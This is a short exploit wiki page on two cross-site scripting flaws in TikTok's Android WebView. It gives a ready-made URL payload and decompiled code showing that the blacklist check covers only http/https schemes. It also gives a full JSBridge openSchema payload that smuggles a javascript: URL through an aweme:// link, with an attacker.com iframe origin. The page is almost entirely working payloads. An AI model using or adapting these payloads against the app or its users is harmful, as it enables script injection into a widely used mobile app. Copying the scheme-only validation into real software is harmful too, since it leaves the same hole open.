Android TikTok XSS Vulnerability

From PwnWiki
Revision as of 10:52, 10 June 2021 by Pwnwiki (talk | contribs) (Created page with "==Generic XSS on TikTok WebView==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Bahasa Indonesia • ‎Chinese • ‎English • ‎中文(中国大陆)‎ • ‎中文(台灣)‎ • ‎中文(繁體)‎

Generic XSS on TikTok WebView

https://m.tiktok.com/falcon/#'),alert(1));//

The following execution will be triggered: 

JSON.stringify(window.performance.getEntriesByName('https://m.tiktok.com/falcon/#'),alert(1));//'))

Add Wiki Activity的另一個XSS

Add Wiki Activity implements URL verification to ensure that URLs in the blacklist will not be opened in it. But the verification is only carried out in the http or https scheme. Because they believe that other programs are invalid and do not need to be verified.

if(!e.b(arg8)) { 

   com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
   return false;

}public static boolean b(String arg1) { 

   return !TextUtils.isEmpty(arg1) && ((arg1.startsWith("http")) || (arg1.startsWith("https"))) && !e.a(arg1);

}

Even if the verification is not based on the javascript solution, this solution can also be used to perform XSS attacks on the WebView. 

window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript://m.tiktok.com/%250adocument.write(%22%3Ch1%3EPoC%3C%2Fh1%3E%22)&disable_app_link=false"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
}));
Retrieved from "https://pwnwiki.com/index.php?title=安卓版TikTok_XSS漏洞/en&oldid=4581"